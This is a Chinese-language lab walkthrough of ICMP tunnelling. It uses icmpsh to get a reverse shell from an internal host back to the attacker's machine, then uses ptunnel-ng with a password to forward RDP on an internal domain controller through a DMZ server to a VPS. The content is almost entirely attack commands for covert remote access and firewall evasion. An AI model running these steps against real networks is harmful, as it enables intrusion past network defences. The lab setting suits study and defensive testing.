一 icmpsh(跨平台) 环境: 外网攻击测试机,内网主机 下载工具: git clonehttps://github.com/inquisb/icmpsh.git 安装依赖包: apt-get install python-impacket 修改icmp通信方法: sysctl -w net.ipv4.icmp_echo_ignore_all=1 外网攻击测试机: ./icmpsh_m.py ip(攻击) ip(目标) //等待反弹shell 内网主机: icmpsh.exe -t i p(攻击) -d 500 -b 30 -s 128
二 pingtunnel(跨平台,可设置密码) 2.1 实验环境 软件防火墙: VM配置:双网卡:桥接+仅主机 monowall 10.1.1.1/192.168.1.10 公网vps: VM配置:桥接 kali2020 192.168.1.13 攻击者PC: VM配置:桥接 windows7 192.168.1.2 DMZ区服务器: VM配置:双网卡 仅主机+桥接 kali2020 192.168.1.4/10.1.1.5 内网PC: VM配置:仅主机 windows2012 10.1.1.2(DC) 2.2 简单拓扑
2.3 功能实现 通过ICMP协议,使攻击者能直接控制内网PC 2.4 过程复现 A vps和dmz区服务器安装pingtunnel工具 1.下载https://github.com/lnslbrty/ptunnel-ng 2.安装编译 tar xf PingTunnel-0.72.tar.gz cd PingTunnel make && make install 可能遇到的错误 缺少pcap.h wget http://www.tcpdump.org/release/libpcap-1.9.0.tar.gz tar zxvf libpcap-1.9.0.tar.gz cd libpcap-1.9.0 ./configure yacc包错误 Sudo apt-get install –y byacc ./configure make sudo make install B 在dmz区服务器开启监听 ptunnel -x shuteer //-x shuteer 设置密码为shuteer
C 在vps开启监听 ptunnel -p 192.168.1.4 -lp 1080 -da 10.1.1.2 -dp 3389 -x shuteer //在vps本地的1080端口监听dmz区服务器icmp的流量,并转发到内网主机的3389端口
参数说明: -x 指定 icmp 隧道连接验证密码 -lp 指定要监听的本地 tcp 端口 -da 指定要转发到的机器的 ip 地址 -dp 指定要转发到的机器的 tcp 端口 -p 指定icmp隧道另一端机器的 ip 地址 D 在攻击者PC 连接vps服务器的1080端口,并登录:
